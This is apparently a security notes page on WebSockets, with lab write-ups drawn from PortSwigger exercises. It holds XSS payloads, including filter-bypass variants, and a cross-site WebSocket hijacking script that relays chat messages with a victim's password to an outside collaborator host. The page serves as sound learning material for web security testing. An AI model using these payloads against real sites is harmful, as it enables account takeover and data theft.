WebSockets

A WebSocket is a communication protocol that provides full-duplex communication channels over a single TCP connection. It is designed to be implemented in web browsers and web servers but can be used by any client or server application.

General Information

Process

Handshake: The connection starts with an HTTP handshake, where the client sends an upgrade request to switch the protocol from HTTP to WebSocket.
Data Frames: After the handshake, data is exchanged in frames (text or binary data).
Connection Lifecycle: The connection remains open, allowing either party to send data until one side closes the connection.

Examples

XXS via WebSockets

The example below is based on PostSwigger's lab.

If we sent a payload directly from the Live chat functionality, it gets encoded (Figure 1).

<img scr=x onerror=alert()>;

We can intercept the traffic, decode the payload manually, and let the traffic be forwarded (Figure 2).

WebSocket Hijacking

To achieve WebSocket Hijacking we need to perform a attack on a WebSocket handshake, which is possible if:

The handshake relies on cookies.
There are no CSRF tokens.

We notice that we are assigned a session cookie with the SameSite attribute set to None, which is a prerequisite for this attack (Figure 3).

After inspecting the WebSocket connection behaviour, we can create a payload and retrieve the chat logs which include carlos's password (Figure 4).

<script>
var ws = new WebSocket('wss://0a4700f603803331818f583600220083.web-security-academy.net/chat');
ws.onopen = function() {
  ws.send("READY");
}

ws.onmessage = function(event) {
  fetch('https://6gnqllgs5kwtsbomr9wxdigcx33urmfb.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
}
</script>

Blacklisted IPs

<img src=x onerror=alert()>;

<img scr=x oNeRroR=alert`1`>

PreviousMass Assignment NextOpen Redirects

Last updated 9 months ago

Was this helpful?